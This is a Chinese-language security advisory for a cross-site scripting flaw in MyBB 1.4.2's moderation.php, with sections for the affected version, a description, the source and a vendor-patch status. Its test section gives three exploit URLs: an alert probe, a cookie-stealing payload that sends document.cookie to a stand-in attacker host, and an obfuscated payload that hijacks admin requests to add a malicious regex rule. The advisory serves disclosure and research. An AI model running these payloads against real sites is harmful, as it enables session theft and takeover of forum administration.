中文版
|
ENGLISH
|
韩文
旗下网站:
梦网手机
首页
|
安全资讯
|
企业热线
|
软件下载
|
安全保姆
|
关于我们
|
论坛
HKC安全网软件公告
红客中国自主开发的红客网警系列软件将在10月隆重上市,敬请关注。(红客中国反入侵精灵将暂时停止下载)
漏洞公告
病毒公告
安全聚焦
技术文章
首页
>
安全资讯
>
漏洞公告
MyBB moderation.php跨站脚本执行漏洞
发布日期:2008-10-28 14:15:10 共阅0次
受影响系统:
MyBB MyBB 1.4.2
描述:
BUGTRAQ ID:
31935
MyBB是一款流行的Web论坛程序。
MyBB moderation.php文件中的redirect()函数使用AJAX开关允许JavaScript重新定向,如果用户在请求中包含有htmlspecialchars无法转义的单引号的话,就可以执行跨站脚本攻击,导致以提升的权限执行任意操作,包括PHP和SQL注入。
<*来源:Micheal Cottingham
链接:
http://marc.info/?l=bugtraq&m=122512395012838&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')//
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.attacker.example/cookiejar.php?c=%27%2Bdocument.cookie//
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27)%2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//
建议:
厂商补丁:
MyBB
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mybboard.com/
Copyright ◎ 2004 - 2008 红客中国安全网版权所有
